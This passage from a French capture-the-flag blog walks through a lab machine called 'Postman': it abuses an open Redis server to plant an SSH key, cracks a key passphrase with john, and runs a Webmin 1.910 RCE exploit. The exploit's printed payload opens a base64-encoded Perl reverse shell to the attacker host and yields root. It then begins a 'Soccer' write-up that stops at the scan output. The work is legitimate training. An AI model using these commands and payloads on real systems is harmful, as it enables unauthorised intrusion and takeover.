AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIRgCn2sRihplwq7a2XuFsHzC9hW+qA/QsZif9QKAEBiUK6jv/B+UxDiPJiQp3KZ3tX6Arff/FC0NXK27c3EppI<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIF3FKsLVdJ5BN8bLpf80Gw89+4wUslxhI3wYfnS+53Xd </span></span><span class="line"><span class="cl">80/tcp open http syn-ack Apache httpd 2.4.29 <span class="o">((</span>Ubuntu<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET POST OPTIONS HEAD </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-favicon: Unknown favicon MD5: E234E3E8040EFB1ACD7028330A956EBF </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: The Cyber Geek<span class="s1">&#39;s Personal Website </span></span></span><span class="line"><span class="cl"><span class="s1">|_http-server-header: Apache/2.4.29 (Ubuntu) </span></span></span><span class="line"><span class="cl"><span class="s1">6379/tcp open redis syn-ack Redis key-value store 4.0.9 </span></span></span><span class="line"><span class="cl"><span class="s1">10000/tcp open http syn-ack MiniServ 1.910 (Webmin httpd) </span></span></span><span class="line"><span class="cl"><span class="s1">|_http-title: Site doesn&#39;</span>t have a title <span class="o">(</span>text/html<span class="p">;</span> <span class="nv">Charset</span><span class="o">=</span>iso-8859-1<span class="o">)</span>. </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-favicon: Unknown favicon MD5: 91549383E709F4F1DD6C8DAB07890301 </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="redis-server">Redis server </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nc 10.10.10.160 <span class="m">6379</span> </span></span><span class="line"><span class="cl">info </span></span><span class="line"><span class="cl"><span class="nv">$2729</span> </span></span><span class="line"><span class="cl"><span class="c1">## Server</span> </span></span><span class="line"><span class="cl">redis_version:4.0.9 </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>Ou</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap --script redis-info -sV -p <span class="m">6379</span> 10.10.10.160 </span></span><span class="line"><span class="cl">Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2025-03-13 08:55 EDT </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> postman <span class="o">(</span>10.10.10.160<span class="o">)</span> </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.015s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">6379/tcp open redis Redis key-value store 4.0.9 <span class="o">(</span><span class="m">64</span> bits<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> redis-info: </span></span><span class="line"><span class="cl"><span class="p">|</span> Version: 4.0.9 </span></span><span class="line"><span class="cl"><span class="p">|</span> Operating System: Linux 4.15.0-58-generic x86_64 </span></span><span class="line"><span class="cl"><span class="p">|</span> Architecture: <span class="m">64</span> bits </span></span><span class="line"><span class="cl"><span class="p">|</span> Process ID: <span class="m">656</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Used CPU <span class="o">(</span>sys<span class="o">)</span>: 4.58 </span></span><span class="line"><span class="cl"><span class="p">|</span> Used CPU <span class="o">(</span>user<span class="o">)</span>: 1.78 </span></span><span class="line"><span class="cl"><span class="p">|</span> Connected clients: <span class="m">1</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Connected slaves: <span class="m">0</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Used memory: 820.55K </span></span><span class="line"><span class="cl"><span class="p">|</span> Role: master </span></span><span class="line"><span class="cl"><span class="p">|</span> Bind addresses: </span></span><span class="line"><span class="cl"><span class="p">|</span> 0.0.0.0 </span></span><span class="line"><span class="cl"><span class="p">|</span> ::1 </span></span><span class="line"><span class="cl"><span class="p">|</span> Client connections: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ 10.10.14.13 </span></span></code></pre></td></tr></table> </div> </div><h3 id="redis-user---ssh-key-upload">redis user - SSH key upload </h3><p>A l&rsquo;aide la page de hacktricks pentest de Redis (port 6379): <a class="link" href="https://book.hacktricks.wiki/en/network-services-pentesting/6379-pentesting-redis.html" target="_blank" rel="noopener" >https://book.hacktricks.wiki/en/network-services-pentesting/6379-pentesting-redis.html</a></p> <p>On teste plusieurs exploit. Finalement, on réussi à upload une clé ssh et à se connecter à l&rsquo;utilisateur redis.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Postman<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh-keygen ... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Postman<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ <span class="o">(</span><span class="nb">echo</span> -e <span class="s2">&#34;\n\n&#34;</span><span class="p">;</span> cat ./id_rsa.pub<span class="p">;</span> <span class="nb">echo</span> -e <span class="s2">&#34;\n\n&#34;</span><span class="o">)</span> &gt; spaced_key.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Postman<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ cat spaced_key.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMg9HyTSSz/I3DToPpGZ7w5G9qM5cOWCoJB0YfaEngD1Biw1RQVRdcBtQyRa+mnJinaK5h2moZHxJyVagxmxjBrAGm0lB+kQnSNZsYFlSuPAKGu3kW/0xA2xQJMq3g5m9WkFZZVkuV++eCjFj0txnNOOKK1m92hWopoH6oK5UcIdDRPbI7gE+Ju6zTEWUcTZuSpVDhMYfwIsct3kkXIGERsvTESX7I9amEgzPN25B7a5vhbSoey/rb0FHvKP2Fg9AL+fUht/6p5YM8qQRxq/G2S7enRCH2G564hzyBOqr9sIILow7Skf1dJgR1ODI0nVQ6oMKWLz/Ef6h7KPn95/GCHDzrlFJkLNWgRsYTHDsv+fcaev26NDYSV/RIwPo2HhiecJqWBNuixObj/XCA533f3zaqx8XjnDQOkR2RZciZLh7V+unC4Kvm2XyQTwJ0wFWSP4IUxzTYaDCjMIRXpWTxka95lP/4/MPm++m7VmNDYN6ODO+UPpowzT4AuW2i78E<span class="o">=</span> kali@kali </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Postman<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ cat spaced_key.txt <span class="p">|</span> redis-cli -h 10.10.10.160 -x <span class="nb">set</span> ssh_key </span></span><span class="line"><span class="cl">OK </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Postman<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ redis-cli -h 10.10.10.160 </span></span><span class="line"><span class="cl">10.10.10.160:6379&gt; config <span class="nb">set</span> dir /var/lib/redis/.ssh </span></span><span class="line"><span class="cl">OK </span></span><span class="line"><span class="cl">10.10.10.160:6379&gt; config <span class="nb">set</span> dbfilename <span class="s2">&#34;authorized_keys&#34;</span> </span></span><span class="line"><span class="cl">OK </span></span><span class="line"><span class="cl">10.10.10.160:6379&gt; save </span></span><span class="line"><span class="cl">OK </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Postman<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh -i id_rsa redis@10.10.10.160 </span></span><span class="line"><span class="cl">Welcome to Ubuntu 18.04.3 LTS <span class="o">(</span>GNU/Linux 4.15.0-58-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Last login: Mon Aug <span class="m">26</span> 03:04:25 <span class="m">2019</span> from 10.10.10.1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">redis@Postman:~$ whoami </span></span><span class="line"><span class="cl">redis </span></span></code></pre></td></tr></table> </div> </div><h2 id="redis---matt">redis -&gt; Matt </h2><h3 id="ssh-key-backup">ssh key backup </h3><p>Grâce à linpeas, on trouve un fichier .bak avec des clés ssh.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">╔══════════╣ Backup files <span class="o">(</span>limited 100<span class="o">)</span> </span></span><span class="line"><span class="cl">-rwxr-xr-x <span class="m">1</span> Matt Matt <span class="m">1743</span> Aug <span class="m">26</span> <span class="m">2019</span> /opt/id_rsa.bak </span></span></code></pre></td></tr></table> </div> </div><p>Cependant, il faut déchiffrer cette clé et trouver la passphrase. On peut la convertir avec <strong>ssh2john</strong> puis ensuite tenter de la cracker avec rockyou.txt et john bien sûr :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Postman<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh2john ./matt.key &gt; matt.hash </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Postman<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ john --format<span class="o">=</span>ssh matt.hash --wordlist<span class="o">=</span>/usr/share/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">Using default input encoding: UTF-8 </span></span><span class="line"><span class="cl">Loaded <span class="m">1</span> password <span class="nb">hash</span> <span class="o">(</span>SSH, SSH private key <span class="o">[</span>RSA/DSA/EC/OPENSSH 32/64<span class="o">])</span> </span></span><span class="line"><span class="cl">Cost <span class="m">1</span> <span class="o">(</span>KDF/cipher <span class="o">[</span><span class="nv">0</span><span class="o">=</span>MD5/AES <span class="nv">1</span><span class="o">=</span>MD5/3DES <span class="nv">2</span><span class="o">=</span>Bcrypt/AES<span class="o">])</span> is <span class="m">1</span> <span class="k">for</span> all loaded hashes </span></span><span class="line"><span class="cl">Cost <span class="m">2</span> <span class="o">(</span>iteration count<span class="o">)</span> is <span class="m">2</span> <span class="k">for</span> all loaded hashes </span></span><span class="line"><span class="cl">Will run <span class="m">2</span> OpenMP threads </span></span><span class="line"><span class="cl">Press <span class="s1">&#39;q&#39;</span> or Ctrl-C to abort, almost any other key <span class="k">for</span> status </span></span><span class="line"><span class="cl">computer2008 <span class="o">(</span>./matt.key<span class="o">)</span> </span></span><span class="line"><span class="cl">1g 0:00:00:00 DONE <span class="o">(</span>2025-03-13 11:08<span class="o">)</span> 3.333g/s 822720p/s 822720c/s 822720C/s comunista..comett </span></span><span class="line"><span class="cl">Use the <span class="s2">&#34;--show&#34;</span> option to display all of the cracked passwords reliably </span></span><span class="line"><span class="cl">Session completed. </span></span></code></pre></td></tr></table> </div> </div><p>On trouve la passphrase ! <code>computer2008</code></p> <p>On peut même déchiffrer définitevement la clé pour ne plus écrire le mot de passe:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Postman<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ openssl rsa -in matt.key -out matt.decrypted_key -passin pass:computer2008 </span></span><span class="line"><span class="cl">writing RSA key </span></span></code></pre></td></tr></table> </div> </div><p>Cependant, la connexion SSH ne fonctionne pas. La clé n&rsquo;est plus la bonne, mais la passphrase avec lequel elle etait chiffré nous a permis de nous connecter ensuite avec un &ldquo;su&rdquo; depusi le shell précédemment obtenu (user: redis) :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">redis@Postman:/opt$ su Matt </span></span><span class="line"><span class="cl">Password: </span></span><span class="line"><span class="cl">Matt@Postman:/opt$ whoami </span></span><span class="line"><span class="cl">Matt </span></span></code></pre></td></tr></table> </div> </div><h3 id="matt---user-flag">Matt - user flag </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Matt@Postman:/opt$ <span class="nb">cd</span> </span></span><span class="line"><span class="cl">Matt@Postman:~$ ls </span></span><span class="line"><span class="cl">user.txt </span></span><span class="line"><span class="cl">Matt@Postman:~$ cat user.txt </span></span><span class="line"><span class="cl">9259.....a41d </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="authenticated-rce-on-webmin-1910">Authenticated RCE on webmin 1.910 </h3><p>On avait répérer au début de l&rsquo;énumeration de la machine, que le service webmin pouvait potentiellement etre vulnérable à une RCE mais il fallait être connecté avec un utilisateur pour pouvoir l&rsquo;exploiter. Nous avons désormais l&rsquo;utilisateur Matt avec son mot de passe (computer2008).</p> <p>En faisant quelques recherches sur internet, on trouve un script python sur github permettant d&rsquo;exploiter cette vulnérabilité et d&rsquo;executer des commandes.</p> <p>En executant linpeas avec l&rsquo;utilisateur Matt, et meme avec l&rsquo;utilisateur redis, nous avions remarqué que webmin était executé en tant que root sur la machine ! En arrivant a exploiter la RCE sur webmin, on pourrait donc executer des commandes en tant que root :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════ </span></span><span class="line"><span class="cl"> ╚════════════════════════════════════════════════╝ </span></span><span class="line"><span class="cl">╔══════════╣ Running processes <span class="o">(</span>cleaned<span class="o">)</span> </span></span><span class="line"><span class="cl">╚ Check weird <span class="p">&amp;</span> unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">redis <span class="m">656</span> 0.0 0.3 <span class="m">51576</span> <span class="m">3648</span> ? Ssl 10:44 0:13 /usr/bin/redis-server 0.0.0.0:6379 </span></span><span class="line"><span class="cl">root <span class="m">672</span> 0.0 1.6 <span class="m">331332</span> <span class="m">14812</span> ? Ss 10:44 0:00 /usr/sbin/apache2 -k start </span></span><span class="line"><span class="cl">www-data <span class="m">673</span> 0.0 1.1 <span class="m">335856</span> <span class="m">10116</span> ? S 10:44 0:00 _ /usr/sbin/apache2 -k start </span></span><span class="line"><span class="cl">www-data <span class="m">674</span> 0.0 1.0 <span class="m">335840</span> <span class="m">10056</span> ? S 10:44 0:00 _ /usr/sbin/apache2 -k start </span></span><span class="line"><span class="cl">www-data <span class="m">675</span> 0.0 1.1 <span class="m">335856</span> <span class="m">10120</span> ? S 10:44 0:00 _ /usr/sbin/apache2 -k start </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">root <span class="m">751</span> 0.0 3.1 <span class="m">95308</span> <span class="m">29348</span> ? Ss 10:44 0:02 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf </span></span><span class="line"><span class="cl"><span class="c1">## ^^^</span> </span></span><span class="line"><span class="cl"><span class="c1">## |||</span> </span></span><span class="line"><span class="cl"><span class="c1">## |||</span> </span></span></code></pre></td></tr></table> </div> </div><p>On execute le python permettant d&rsquo;exploiter webmin et on obtient un shell en tant que root: ( <a class="link" href="https://github.com/NaveenNguyen/Webmin-1.910-Package-Updates-RCE/tree/master" target="_blank" rel="noopener" >https://github.com/NaveenNguyen/Webmin-1.910-Package-Updates-RCE/tree/master</a> )</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Postman<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 webmin_exploit.py --ip_address 10.10.10.160 --port <span class="m">10000</span> --lhost 10.10.14.13 --lport <span class="m">1337</span> --user Matt --password computer2008 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Webmin 1.9101- <span class="s1">&#39;Package updates&#39;</span> RCE </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Generating Payload... </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Reverse Payload Generated : <span class="nv">u</span><span class="o">=</span>acl%2Fapt<span class="p">&amp;</span><span class="nv">u</span><span class="o">=</span>%20%7C%20bash%20-c%20%22%7Becho%2CcGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4xMzoxMzM3Iik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0%2BZmRvcGVuKCRjLHcpO3doaWxlKDw%2BKXtpZigkXz1%2BIC8oLiopLyl7c3lzdGVtICQxO319Oyc%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22<span class="p">&amp;</span><span class="nv">ok_top</span><span class="o">=</span>Update+Selected+Packages </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Attempting to login to Webmin </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Login Successful </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Attempting to Exploit </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Exploited Successfully </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">---------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.13<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.160<span class="o">]</span> <span class="m">41548</span> </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">cat /root/root.txt </span></span><span class="line"><span class="cl">a417.....1153 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/soccer-htb/Wed, 12 Mar 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/soccer-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Soccer cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Soccer</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.194</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">player : PlayerOftheMatch2022 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Soccer<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.194 </span></span><span class="line"><span class="cl">Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2025-03-10 18:21 EDT </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">3072</span> ad:0d:84:a3:fd:cc:98:a4:78:fe:f9:49:15:da:e1:6d <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChXu/2AxokRA9pcTIQx6HKyiO0odku5KmUpklDRNG+9sa6olMd4dSBq1d0rGtsO2rNJRLQUczml6+N5DcCasAZUShDrMnitsRvG54x8GrJyW4nIx4HOfXRTsNqImBadIJtvIww1L7H1DPzMZYJZj/oOwQHXvp85a2hMqMmoqsljtS/jO3tk7NUKA/8D5KuekSmw8m1pPEGybAZxlAYGu3KbasN66jmhf0ReHg3Vjx9e8FbHr3ksc/MimSMfRq0lIo5fJ7QAnbttM5ktuQqzvVjJmZ0+aL7ZeVewTXLmtkOxX9E5ldihtUFj8C6cQroX69LaaN/AXoEZWl/v1LWE5Qo1DEPrv7A6mIVZvWIM8/AqLpP8JWgAQevOtby5mpmhSxYXUgyii5xRAnvDWwkbwxhKcBIzVy4x5TXinVR7FrrwvKmNAG2t4lpDgmryBZ0YSgxgSAcHIBOglugehGZRHJC9C273hs44EToGCrHBY8n2flJe7OgbjEL8Il3SpfUEF0<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> df:d6:a3:9f:68:26:9d:fc:7c:6a:0c:29:e9:61:f0:0c <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span 